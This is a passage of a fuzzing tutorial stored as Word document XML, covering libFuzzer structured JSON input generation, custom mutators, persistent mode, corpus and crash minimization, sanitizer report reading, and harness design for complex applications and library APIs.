        <w:t xml:space="preserve">Applications processing JSON don’t crash on completely malformed input—​they crash on JSON that passes initial parsing but triggers edge cases in downstream processing logic. Effective testing requires generating valid JSON structures while systematically exploring the edge cases that cause failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JSON input generation requires balancing structural validity with comprehensive edge case exploration. Start with valid JSON examples that represent your API’s expected input structure, then systematically vary components that commonly cause failures: string values with Unicode edge cases, numeric values at integer boundaries, and nesting depths that stress parsing logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The harness structure builds on the basic libFuzzer patterns you’ve learned while adding JSON-specific intelligence. Use libFuzzer’s input to drive variations in JSON structure and content rather than generating completely random JSON. This approach finds failures in your JSON processing logic rather than just testing JSON parser error handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s walk through building a JSON API harness step by step. Your API probably expects JSON objects with specific field structures like user profiles, configuration updates, or data submissions. The fuzzing harness needs to generate JSON that looks realistic enough to pass initial validation while exploring edge cases in field processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, establish the basic JSON structure. Use libFuzzer input to determine which fields to include, but maintain reasonable JSON syntax. You might use input bytes to select field combinations, vary string lengths, or choose numeric values while preserving overall JSON validity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second, focus edge case exploration on the areas that matter for your API. If your user profile API processes email addresses, generate emails with Unicode edge cases. If it handles user ages, explore integer boundary conditions. If it processes nested preference objects, vary nesting depths systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third, understand that structured input generation finds different failures than random testing. Instead of discovering that malformed JSON gets rejected (which is expected behavior), you find subtle failures in field validation, character encoding, and business logic that only manifest with specific input combinations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="X8b5b81f803e8595f33fbeba9fd5bc09e2fcb863"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply Structured Generation to Your Data Formats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every application processes structured data: configuration files, network protocols, database queries, or API payloads. The structured generation approach applies broadly beyond JSON to any format where random bytes fail to exercise deep processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For XML processing, maintain tag structure while varying content and attributes. For binary protocols, preserve headers and checksums while mutating payload data. For configuration files, maintain syntax while exploring parameter combinations that stress application logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight is that effective fuzzing of structured formats requires understanding the format well enough to generate inputs that pass initial parsing but stress downstream processing. This requires more investment in harness development but finds failures that random testing would miss entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build structured generation harnesses for the data formats most critical to your application’s reliability. Focus on formats that handle external input and could cause service outages if they fail: API request processing, configuration loading, and user data imports.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="Xdc2c65ace1544dd0d4d480ba44d23e85dea62db"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build Custom Mutators for Application-Specific Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your application has specific failure modes based on its processing logic and data formats. Custom mutators encode this knowledge to focus testing on input combinations most likely to reveal reliability problems specific to your application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Custom mutators implement application-specific mutation strategies that reflect how your input processing actually works. If your application processes user profiles with interdependent fields, your mutator can modify related fields together. If your API expects specific field combinations, your mutator can generate valid combinations with subtle violations that test validation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The development process starts with understanding your application’s input processing patterns. Analyze which input characteristics commonly cause failures: specific field combinations, boundary values, encoding edge cases, or format variations. Design mutation strategies that systematically explore these failure-prone areas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For your JSON API, a custom mutator might understand the relationship between user profile fields and generate coordinated mutations: email domains that match country fields, phone numbers with appropriate country codes, or age values that align with other demographic data. This generates more realistic test cases that stress business logic rather than just format parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Custom mutator development requires balancing complexity with effectiveness. Simple mutators might just vary field values intelligently, while complex implementations might maintain semantic relationships between fields or generate realistic user behavior patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The investment pays off through faster discovery of application-specific reliability issues. Instead of randomly exploring input space, you focus testing effort on patterns most likely to cause failures in your specific application architecture.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="Xce1ba95e36f15c270c0a5fafa99206cd462ce62"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measure Structured Generation Effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compare the effectiveness of structured generation versus random input testing. Run your JSON API harness both with random bytes and with structured JSON generation to see the difference in coverage and crash discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Random testing typically finds only basic input validation failures—​malformed JSON gets rejected appropriately, but deep processing logic remains unexplored. Structured generation reaches the business logic where real failures hide, discovering crashes in field validation, character encoding, and application-specific processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document this effectiveness difference. Track coverage achieved, crashes discovered, and time to first crash for both approaches. You’ll typically find that structured generation achieves higher coverage faster and discovers more relevant failures for your application’s reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This effectiveness measurement builds confidence in your testing approach and prepares you for similar decisions in Part II. When you’re fuzzing Java APIs with Jazzer, Python web services with Atheris, or JavaScript applications with Jazzer.js, you’ll need to make similar decisions about input generation strategies.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="65" w:name="Xe0de2e8dd4d4b0b4e2b96c6e9e9c6265d7c7552"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimize Performance for Systematic Exploration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic libFuzzer setups might execute thousands of test cases per hour, which provides limited coverage for complex applications where subtle failures require extensive exploration to trigger. This section shows you optimization techniques that enable thorough testing while building the performance mindset you’ll need for production-scale fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="62" w:name="X7d3969c2defe4dd5198d1d15b3c1b6fb9779eea"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable Persistent Mode for High-Throughput Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard libFuzzer operation forks new processes for each test case, introducing overhead that limits testing throughput. Persistent mode eliminates this overhead by keeping your target application loaded in memory between test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistent mode implementation follows patterns you’ll use across all high-performance fuzzing campaigns. The key insight is maintaining clean state between test cases while avoiding expensive initialization overhead. Your harness must reset global variables, clean up heap allocations, and close file descriptors between test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s build persistent mode step by step for your email validation harness. First, restructure your harness to separate one-time initialization from per-test-case processing. Move expensive setup—​loading configuration files, initializing libraries, or establishing connections—​into global constructors that execute once when the harness starts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second, implement state cleanup between test cases. Email validation might seem stateless, but underlying libraries could maintain internal state, cache previous results, or accumulate error conditions. Reset this state explicitly to ensure each test case starts from identical conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third, measure the performance improvement. Run your harness both with and without persistent mode to see the throughput difference. You’ll typically see 10-100x improvement in test cases per second, enabling discovery of subtle failures that require millions of iterations to trigger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This performance optimization prepares you for Part II where high-throughput testing becomes essential. Java applications with Jazzer, Python web services with Atheris, and JavaScript applications with Jazzer.js all benefit from persistent mode optimization, though the implementation details vary by language.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="X0486d626e0f5ae502c1928e7b474ce534cd65f7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor and Tune Fuzzing Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective performance optimization requires understanding your fuzzing campaign’s bottlenecks. LibFuzzer provides statistics that show execution rate, coverage growth, and resource utilization. Use these metrics to identify performance problems and optimize accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Watch the "exec/s" metric—​executions per second—​to understand your throughput. Simple functions might achieve 100,000+ executions per second, while complex applications might run 1,000-10,000 executions per second. Low execution rates suggest performance bottlenecks in your harness or target function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor coverage growth patterns to understand exploration effectiveness. Rapid initial coverage growth followed by plateau suggests your corpus provides good exploration of reachable code. Slow coverage growth might indicate harness problems or insufficient seed inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Track memory usage throughout fuzzing campaigns. Memory leaks in persistent mode can cause gradually degrading performance or eventual crashes. Set memory limits using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-rss_limit_mb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to catch resource leaks before they affect system stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document these performance baselines for your critical functions. Understanding normal performance characteristics helps you recognize when changes to your code or harness affect fuzzing effectiveness. This performance monitoring mindset becomes essential when you’re running enterprise-scale fuzzing campaigns in Part II.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="X16349ad1a9848a970a712c86420b2a5bcc107dc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manage Corpus Quality for Effective Exploration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corpus quality affects libFuzzer’s ability to explore deep code paths more than any other factor. Well-curated corpora provide starting points that reach different processing logic, while poor corpora waste computation on redundant inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corpus management starts with understanding that not all inputs contribute equally to exploration effectiveness. Some inputs exercise unique code paths and deserve preservation, while others duplicate coverage provided by smaller, simpler inputs and should be removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use libFuzzer’s corpus minimization to eliminate redundant inputs. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-merge=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag processes your existing corpus and removes inputs that don’t contribute unique coverage. This process can reduce corpus size by 80-90% while maintaining identical coverage, dramatically improving fuzzing performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build corpus quality assessment into your regular workflow. After running fuzzing campaigns, analyze which inputs contributed to coverage growth and which discovered crashes. Understanding these patterns helps you improve seed selection and identify areas where your input processing might need additional testing focus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For your email validation function, good corpus seeds might include: basic valid emails, international domain names, emails with Unicode characters, maximum-length emails, and emails with unusual but valid formats. Poor seeds might include multiple variations of the same basic pattern that don’t exercise different validation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measure corpus effectiveness by comparing coverage achieved with minimized versus unminimized corpora. You’ll typically find that smaller, well-curated corpora achieve higher coverage faster than large collections of redundant inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This corpus management approach scales directly to Part II where you’ll be managing corpora across multiple languages and applications. The principles remain identical whether you’re testing Java APIs, Python web services, or JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="69" w:name="Xf825ed3e8c7dd075de357695f0e4fb99bbd2c14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Debug Crashes Effectively with Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding crashes is only the beginning—​understanding what went wrong and developing effective fixes requires systematic debugging approaches. This section shows you techniques that transform crash discoveries into reliable fixes while building the debugging skills you’ll need for complex applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="66" w:name="X5765222d5c8ec6ac93abc973161389e65fe35ff"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Minimize Crashing Inputs for Faster Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LibFuzzer often discovers crashes using inputs larger and more complex than necessary to trigger the failure. Input minimization reduces crashing inputs to their essential elements, making debugging faster and more effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input minimization transforms complex crashes into simple, understandable test cases. A crash triggered by a 500-byte JSON object might actually require only a 20-byte string to reproduce the same failure. Finding this minimal case dramatically speeds debugging and helps you understand the root cause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LibFuzzer provides automatic minimization through the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-minimize_crash=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag. Run this against your crashing input to automatically find a smaller input that triggers the same crash. The minimization process uses binary search and mutation strategies to systematically reduce input size while preserving the crash condition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual minimization techniques help when automatic reduction isn’t sufficient or when you want to understand the crash mechanism better. Start by removing obviously unnecessary parts of the input: trailing data, unused fields, or repeated sections. Then systematically reduce remaining content while verifying the crash still occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For your email validation crash, minimization might reveal that a specific Unicode character sequence triggers the buffer overflow, regardless of email structure around it. This insight leads directly to the root cause—​Unicode handling logic—​rather than getting distracted by email format complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document your minimization process and results. Understanding which parts of the input are essential for triggering crashes helps you recognize similar failure patterns in future crashes and guides you toward systematic fixes rather than symptom-focused patches.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="X3dd6be8968dfba115aa331ea657f1edd6de86e7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyze Sanitizer Output for Root Cause Understanding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding sanitizer output is crucial for extracting actionable information from crashes. AddressSanitizer and UndefinedBehaviorSanitizer reports contain specific information that guides debugging efforts toward effective solutions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AddressSanitizer reports provide three critical pieces of information: the type of memory violation, the exact memory addresses involved, and complete stack traces showing allocation and violation points. Learning to read these reports quickly transforms raw crashes into understanding of specific problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The memory violation type tells you what went wrong: buffer overflow, use-after-free, double-free, or memory leak. Each violation type suggests different root causes and fix strategies. Buffer overflows might indicate missing bounds checking, while use-after-free errors suggest object lifetime management problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The memory address information shows exactly where the violation occurred relative to allocated memory boundaries. This helps you understand whether you’re writing slightly past a buffer boundary (common off-by-one error) or far beyond allocated memory (suggests completely wrong size calculation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The stack traces show both where memory was allocated and where the violation occurred. Comparing these traces helps you understand the object’s lifetime and identify where the logic error occurred. Did the object get freed too early, or did some code retain a pointer longer than intended?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Practice reading sanitizer output with the crashes your fuzzing discovers. Each crash report provides a debugging exercise that builds your skills in translating sanitizer information into effective fixes. This skill becomes essential in Part II when you’re debugging crashes across different languages and runtime environments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="X94e27070f9d6a6c3a81a837c9c690717359f828"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build Systematic Fix Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding and fixing crashes is only half the reliability improvement process. Verification ensures your fixes actually address root causes rather than just specific symptoms, and that fixes don’t introduce new failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create regression tests from your minimized crashing inputs. Each crash libFuzzer discovers should become a test case that verifies the fix and prevents regression. This builds a growing suite of edge case tests that document your application’s reliability improvements over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use fuzzing to verify fix effectiveness. After fixing a crash, run extended fuzzing campaigns to ensure your fix handles not just the specific crashing input but also related edge cases. Sometimes fixes address specific symptoms while leaving underlying vulnerabilities that manifest with different inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test fix robustness by varying the crashing input. If a specific Unicode string triggered a buffer overflow, test related Unicode sequences to ensure your fix handles the general case rather than just the specific discovered input. This verification helps you develop systematic fixes rather than band-aid solutions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document your fix verification process and results. Track how often initial fixes prove insufficient when tested with extended fuzzing. Understanding this pattern helps you develop more robust fixes initially and builds confidence in your reliability improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This systematic fix verification approach prepares you for Part II where you’ll be managing fixes across multiple languages and applications. The principles of verification remain constant whether you’re fixing crashes in Java, Python, or JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="73" w:name="Xbc72ce5dd6739ce375da0cc14862b727af44078"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply libFuzzer to Real Application Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simple test functions represent only a small part of input processing reliability challenges. This section shows you how to apply libFuzzer techniques to realistic applications with complex initialization, state management, and integration requirements while building the application-level thinking you’ll need for Part II.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="70" w:name="X03a2903fd754b11969eaf7da0bc34700ece38f7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test Applications with Complex Initialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Many applications require complex setup before they can process input: loading configuration files, establishing database connections, or initializing cryptographic contexts. Your harness must handle this initialization efficiently while maintaining systematic testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complex application testing requires separating one-time initialization from per-test-case processing. Expensive operations like loading configuration files, establishing network connections, or initializing libraries should happen once when your harness starts, not for every test case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design your harness architecture with clear separation between setup and testing phases. Use global constructors or static initialization to establish application state, then ensure each test case starts from clean state without repeating expensive initialization. This pattern scales to enterprise applications while maintaining fuzzing performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Handle initialization failures gracefully. Applications might fail to start under certain conditions—​missing configuration files, network connectivity problems, or insufficient permissions. Your harness should detect these failures and abort with clear error messages rather than continuing with invalid application state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For applications that process configuration files, create test harnesses that load configuration once during startup, then systematically test various input processing scenarios. This approach tests your application’s input handling under realistic operating conditions rather than artificial isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document your initialization patterns and performance characteristics. Understanding setup costs helps you optimize harness performance and identify opportunities for improvement. This initialization handling experience prepares you for the complex application scenarios you’ll encounter in Part II.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="X4a86d7b73be9066c3fcb5cd6217c4aa6a9067be"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrate Library API Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing libraries through their public APIs requires different approaches than testing standalone applications. Library functions often have preconditions, shared state, and complex parameter interactions that affect harness structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Library API testing focuses on exercising public interfaces under edge conditions while respecting API contracts. Your harness must generate valid parameter combinations that satisfy preconditions while exploring boundary conditions that might reveal implementation failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parameter generation for library APIs often requires understanding valid parameter ranges, pointer relationships, and resource ownership. Your harness might need to generate multiple related parameters that work together: string pointers with corresponding length parameters, array pointers with size indicators, or handle parameters that reference valid objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">State management between API calls becomes crucial for libraries that maintain internal state. Some functions expect specific call sequences, while others modify global state that affects subsequent calls. Your harness must understand these relationships to generate realistic usage patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
